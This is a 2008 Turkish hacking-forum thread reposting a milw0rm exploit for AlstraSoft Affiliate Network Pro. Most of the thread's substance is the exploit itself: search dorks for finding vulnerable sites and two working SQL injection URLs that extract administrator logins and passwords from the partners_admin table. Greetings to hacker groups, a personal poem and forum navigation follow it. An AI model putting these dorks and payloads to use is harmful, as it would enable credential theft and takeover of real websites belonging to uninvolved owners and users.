X

HeRSeYMeVCuT.CoM / FuLL GüVeNLiK FoRuMLaRı / En Güncel Exploitler / Vulnerabilities / AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability


Konu Bilgileri
Konu Başlığı
AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
Konudaki Cevap Sayısı
0
Konuyu Açan Kişi
M i r z A
Görüntülenme Sayısı
29


HeRSeYMeVCuT.CoM / FuLL GüVeNLiK FoRuMLaRı / En Güncel Exploitler / Vulnerabilities / AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Mesaj Önizleme  Konuyu Gönder 
AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability
Yazar Mesaj
M i r z A
EngLisH TeaCHeR
Administrators

Üye No: 1
Katılım: Jun 2006
Yer: French
Mesajlar: 10,023
Grup: Administrators
Durum Çevrimdışı
Rep Ver :
Rep Puanı : 131
Ruh Hali
asik
MSN araciligi ile mesaj yolla Yahoo araciligi ile mesaj yolla ICQ araciligi ile mesaj yolla AIM araciligi ile mesaj yolla




Mesaj: #1
AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

PHP Kodu:
|___________________________________________________|
|
|AlstraSoft Affiliate Network Pro (pgmRemote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    AuthorHussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
|
script http://www.alstrasoft.com/affiliate.htm
|
DorK   "Affiliate Network Pro"
DorK   inurl:"index.php?Act=directory"
|
|___________________________________________________|

Exploit


www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61+from+partners_admin--

Exploit 2 :

www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1+union+select+1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+partners_admin--

_____________
column_name

login
passwd
_____________



____________________________Greetz )____________________________
|
tryag.cc DeViL iRaQ IRAQ DiveR IRAQ_JAGUR str0ke
|  
|              Iraqihack FAHD mos_chori Silic0n
|_________________________________________________________________


                       Im IRAQi

# milw0rm.com [2008-07-16] 


Bak Dagıttın Yıktın İşte Tekrar
Aldın Elimden Sessizliğimi ,
Bir kez susmuştum senin için
Ve bir kez daha ,
Çaldın işte tek mirasımı
Mutlusun Biliyorum, Gelmesende
Ben bu sefer Zamklıyorum dudaklarımı suskunluğa yeminle..
Nolur gelme artık git.
Bu sefer ben seni istemiyorum İstanbul !
21-07-2008 10:25:36 AM
Kullanıcının websitesini ziyaret et Bu kullanıcının gönderdiği mesajları bul Bu mesajı bir cevapta alıntı yap
Mesaj Önizleme  Konuyu Gönder 

Benzer Konular...
Konu: Yazar Cevaplar: Gösterim: Son Mesaj
  Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability M i r z A 0 32 21-07-2008 10:28:47 AM
Son Mesaj: M i r z A
  vBulletin PhotoPost vBGallery v2.x Remote File Uploa M i r z A 0 64 21-07-2008 10:28:09 AM
Son Mesaj: M i r z A
  PHPizabi v0.848b C1 HFP1 Remote Code Execution M i r z A 0 17 21-07-2008 10:26:58 AM
Son Mesaj: M i r z A

Yazdırılabilir Bir Versiyona Bak
Bu Konuyu Bir Arkadaşına Gönder
Bu Konuya Abone Ol | Konuyu Favorilerine Ekle
Foruma Git:

İletişim | Burada Herseymevcut | En Üste Dön | Konulara Dön | Arşiv | RSS